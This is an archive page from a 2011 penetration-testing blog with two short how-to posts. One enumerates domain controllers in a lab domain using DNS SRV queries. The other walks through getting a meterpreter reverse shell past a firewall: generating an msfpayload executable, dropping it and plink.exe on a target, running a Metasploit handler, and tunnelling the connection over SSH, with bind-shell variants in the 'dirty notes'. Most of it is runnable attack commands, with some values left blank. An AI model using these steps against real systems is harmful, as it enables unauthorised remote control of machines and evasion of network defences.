Quick notes – Enumerate Domain Controllers via nslookup

12/16/2011 § Leave a comment


Let’s say you know the domain name but you would like to enumerate all domain controllers.

domain: hacking.lab.local

# Linux Backtrack 5 R1 (attacker machine) 

  1. Open your linux shell

Using Nslookup

set type=srv

Using Dig (Display a list of domain controllers )

dig SRV _ldap._tcp.dc._msdcs.hacking.lab.local | egrep -v '(;;)'|cut -d" " -f8 | awk NF


Verify DNS registration for DC using nslookuphttp://technet.microsoft.com/en-us/library/cc738991%28WS.10%29.aspx

Get Domain Admins Script (GDA.bat)https://github.com/nullbind/Other-Projects/tree/master/GDA


Quick notes – Get a meterpreter reverse shell through SSH tunnel

12/03/2011 § Leave a comment


Let’s say you are able to upload binaries to your target machine (via webshell, black magic, or bribes).

When you try to upload your meterpreter payload and runs it the firewall kills your session.

Below is a nice trick that you can pull in order to bypass evil firewalls or restrictive rules (keep in mind that sometimes you may need to change the port of your SSH server from 22 to something like 80 or 443).

In my humble opinion, meterpreter shells should never be dropped.

# Linux Backtrack 5 R1 (attacker machine) 

  1. Fire up your SSH server
  2. Generate your meterpreter payload :
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /path/msf.exe
  1. Drop msf.exe on your target
  2. Drop plink.exe on your target (plink version from quest putty)
  3. Set up a msf handler
color false
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost
set lport 4444
set exitonsession false
exploit -j
  • Note: Use instead of (otherwise you will have a lot of problems)

On Mac you will have to set up an alias for lo interface:

# ifconfig lo0 alias

# Windows (target machine)

  1. Connecting to the ssh server and setting up a port forwarding:
plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -L
  1. Start msf.exe

You should get a meterpreter reverse shell.


Resilient SSH Tunneled Meterpreter Sessionhttp://pauldotcom.com/2010/03/resilient-ssh-tunneled-meterpr.html

Quest PuTTYhttp://rc.quest.com/topics/putty/readme/#plinkopt

Dirty notes:


# I had issues with reverse_https, so I highly recommend reverse_tcp
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /path/msfrev.exe

## target ###

plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -L



msfpayload windows/meterpreter/bind_tcp RHOST= LPORT=4444 X > /path/msfbind.exe


plink.exe user@ip_of_my_ssh_server -pw mypass –P port  -auto_store_key_in_cache -R

Where Am I?

You are currently viewing the archives for December, 2011 at hdesser.